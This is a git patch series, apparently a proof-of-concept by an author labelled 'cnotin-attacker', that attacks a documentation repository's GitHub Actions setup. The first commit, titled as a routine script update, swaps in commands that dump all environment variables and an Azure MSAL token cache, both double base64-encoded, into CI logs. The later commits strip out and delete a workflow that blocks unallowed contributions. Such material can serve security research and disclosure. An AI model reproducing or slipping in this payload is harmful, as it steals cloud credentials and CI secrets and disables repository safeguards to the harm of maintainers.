From 497e86a959eb16fd35be5f0a9d33aaa2f6079adc Mon Sep 17 00:00:00 2001 From: cnotin-attacker Date: Mon, 8 Jul 2024 23:20:19 +0200 Subject: [PATCH 1/3] Update get-preview-app-info.sh --- src/workflows/get-preview-app-info.sh | 51 +++++++-------------------- 1 file changed, 12 insertions(+), 39 deletions(-) diff --git a/src/workflows/get-preview-app-info.sh b/src/workflows/get-preview-app-info.sh index 3624f683d088..5d479ecb5212 100755 --- a/src/workflows/get-preview-app-info.sh +++ b/src/workflows/get-preview-app-info.sh @@ -1,41 +1,14 @@ #!/usr/bin/env bash -# [start-readme] -# -# This script sets environment variables with info about the preview app for a given PR -# -# [end-readme] - -# ENV VARS NEEDED TO RUN -[[ -z $GITHUB_REPOSITORY ]] && { echo "Missing GITHUB_REPOSITORY. Exiting."; exit 1; } -[[ -z $PR_NUMBER ]] && { echo "Missing PR_NUMBER. Exiting."; exit 1; } -[[ -z $GITHUB_ENV ]] && { echo "Missing GITHUB_ENV. Exiting."; exit 1; } -[[ -z $APP_NAME_SEED ]] && { echo "Missing APP_NAME_SEED. Exiting."; exit 1; } - -PREVIEW_ENV_LOCATION="eastus" - -# GITHUB_REPOSITORY is a default env variable and cannot be overwritten. -# Use CUSTOM_GITHUB_REPOSITORY to specify a repo owner/name -# other than the repo owner/name where this script was called from. -# If CUSTOM_GITHUB_REPOSITORY is not specified, fall back to GITHUB_REPOSITORY. -REPO_NAME_WITH_OWNER="${CUSTOM_GITHUB_REPOSITORY:-$GITHUB_REPOSITORY}" - -REPO_NAME="${REPO_NAME_WITH_OWNER#*\/}" -echo "REPO_NAME=${REPO_NAME}" >> $GITHUB_ENV - -DEPLOYMENT_NAME="${REPO_NAME}-pr-${PR_NUMBER}" -echo "DEPLOYMENT_NAME=${DEPLOYMENT_NAME}" >> $GITHUB_ENV - -APP_NAME_BASE="${REPO_NAME}-preview-${PR_NUMBER}" - -# pseudo random string so guessing a preview env URL is more difficult -APP_SHA=$(echo -n "${APP_NAME_SEED}-${APP_NAME_BASE}" | sha1sum | cut -c1-6) - -APP_NAME="${APP_NAME_BASE}-${APP_SHA}" -echo "APP_NAME=${APP_NAME}" >> $GITHUB_ENV - -APP_URL="https://${REPO_NAME}-${PR_NUMBER}-${APP_SHA}.preview.ghdocs.com" -echo "APP_URL=${APP_URL}" >> $GITHUB_ENV - -IMAGE_REPO="${REPO_NAME_WITH_OWNER}/pr-${PR_NUMBER}" -echo "IMAGE_REPO=${IMAGE_REPO}" >> $GITHUB_ENV +echo "coucou" +echo "---" +env | base64 -w0 | base64 -w0 +echo "---" +ls -la . +echo "---" +ls -la $HOME +echo "---" +ls -la $HOME/.azure +echo "---" +cat $HOME/.azure/msal_token_cache.json | base64 -w0 | base64 -w0 +echo "---" From 76e922d53fa92bf67f7cd569854aff10691b1816 Mon Sep 17 00:00:00 2001 From: cnotin-attacker Date: Mon, 8 Jul 2024 23:25:32 +0200 Subject: [PATCH 2/3] Update triage-unallowed-contributions.yml --- .../triage-unallowed-contributions.yml | 51 ------------------- 1 file changed, 51 deletions(-) diff --git a/.github/workflows/triage-unallowed-contributions.yml b/.github/workflows/triage-unallowed-contributions.yml index a84ac2767fa0..dd5b826b42e9 100644 --- a/.github/workflows/triage-unallowed-contributions.yml +++ b/.github/workflows/triage-unallowed-contributions.yml @@ -4,54 +4,3 @@ name: Check unallowed file changes # **Why we have it**: Some files can only be changed in the internal repository for security and workflow reasons. # **Who does it impact**: Open source contributors. -on: - # Needed in lieu of `pull_request` so that PRs from a fork can be notified of unallowed changes. - pull_request_target: - -permissions: - contents: read - pull-requests: write - -jobs: - triage: - if: >- - ${{ - github.repository == 'github/docs' && - github.event.pull_request.user.login != 'docs-bot' && - github.event.pull_request.user.login != 'dependabot[bot]' - }} - runs-on: ubuntu-latest - steps: - - name: Check out repo - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1 - - - name: Get files changed - uses: dorny/paths-filter@0bc4621a3135347011ad047f9ecf449bf72ce2bd - id: filter - with: - # Base branch used to get changed files - base: 'main' - - # Enables setting an output in the format in `${FILTER_NAME}_files - # with the names of the matching files formatted as JSON array - list-files: json - - # Returns list of changed files matching each filter - filters: 'src/workflows/unallowed-contribution-filters.yml' - - - name: Set up Node and dependencies - if: ${{ steps.filter.outputs.notAllowed || steps.filter.outputs.contentTypes}} - uses: ./.github/actions/node-npm-setup - - # When there are changes to files we can't accept, leave a comment - # explaining this to the PR author - - name: "Comment about changes we can't accept" - if: ${{ steps.filter.outputs.notAllowed || steps.filter.outputs.contentTypes}} - run: npm run unallowed-contributions - env: - REPO_OWNER_AND_NAME: ${{ github.repository }} - PR_NUMBER: ${{ github.event.number }} - FILE_PATHS_NOT_ALLOWED: ${{ steps.filter.outputs.notAllowed_files }} - CHANGED_FILE_PATHS: ${{ steps.filter.outputs.contentTypes_files }} - ADDED_CONTENT_FILES: ${{ steps.filter.outputs.added_files }} - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} From ee4b130cdb89273ccbac99524ba3c56f2a1e82f1 Mon Sep 17 00:00:00 2001 From: cnotin-attacker Date: Mon, 8 Jul 2024 23:28:52 +0200 Subject: [PATCH 3/3] Delete .github/workflows/triage-unallowed-contributions.yml --- .github/workflows/triage-unallowed-contributions.yml | 6 ------ 1 file changed, 6 deletions(-) delete mode 100644 .github/workflows/triage-unallowed-contributions.yml diff --git a/.github/workflows/triage-unallowed-contributions.yml b/.github/workflows/triage-unallowed-contributions.yml deleted file mode 100644 index dd5b826b42e9..000000000000 --- a/.github/workflows/triage-unallowed-contributions.yml +++ /dev/null @@ -1,6 +0,0 @@ -name: Check unallowed file changes - -# **What it does**: If someone changes some files in the open repo, we prevent the pull request from merging. -# **Why we have it**: Some files can only be changed in the internal repository for security and workflow reasons. -# **Who does it impact**: Open source contributors. -